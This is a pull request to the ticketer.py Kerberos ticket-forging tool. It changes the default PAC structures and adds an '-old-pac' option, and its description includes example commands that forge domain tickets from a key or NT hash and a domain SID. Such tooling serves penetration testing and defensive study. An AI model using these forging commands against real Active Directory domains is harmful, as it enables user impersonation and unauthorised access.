### PR TITLE
Ticketer: Changed default PAC 

### DIFF
--- a/examples/ticketer.py
+++ b/examples/ticketer.py
@@ -248,6 +248,8 @@ class TICKETER:
 
         if self.__options.extra_pac:
             self.createUpnDnsPac(pacInfos)
+
+        if self.__options.old_pac is False:
             self.createAttributesInfoPac(pacInfos)
             self.createRequestorInfoPac(pacInfos)
 
@@ -883,6 +885,8 @@ if __name__ == '__main__':
                                                                           'created for (default = 500)')
     parser.add_argument('-extra-sid', action="store", help='Comma separated list of ExtraSids to be included inside the ticket\'s PAC')
     parser.add_argument('-extra-pac', action='store_true', help='Populate your ticket with extra PAC (UPN_DNS)')
+    parser.add_argument('-old-pac', action='store_true', help='Use the old PAC structure to create your ticket (exclude '
+                                                              'PAC_ATTRIBUTES_INFO and PAC_REQUESTOR')
     parser.add_argument('-duration', action="store", default = '87600', help='Amount of hours till the ticket expires '
                                                                              '(default = 24*365*10)')
     parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')


### PR DESCRIPTION
- The **default** ticket structure contains the new PACs: `PAC_ATTRIBUTES_INFO` and `PAC_REQUESTOR`.
- Added option `-old-pac` to forge tickets with the old structure. It will exclude `PAC_ATTRIBUTES_INFO` and `PAC_REQUESTOR`.
- If you need to include the `UPN_DNS_INFO` structure in your ticket, you can use the `-extra-pac` option.

Examples:

- `ticketer.py -aesKey 7873... -domain-sid S-1-5-21-228... -domain contoso.com -user-id 1111 username`

It will forge a ticket with the new PAC structures for _username_ in the _contoso_ domain. Since [November 2021 updates](https://support.microsoft.com/en-gb/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041#:~:text=November%209%2C%202021%3A%20Initial%20deployment%20phase), the _username_ must exist in the domain and have a matching RID (You have to set the `-user-id` option).

- `ticketer.py -nthash f450... -domain-sid S-1-5-21-295... -domain example.com -old-pac username`

It will forge a ticket with the old PAC structure.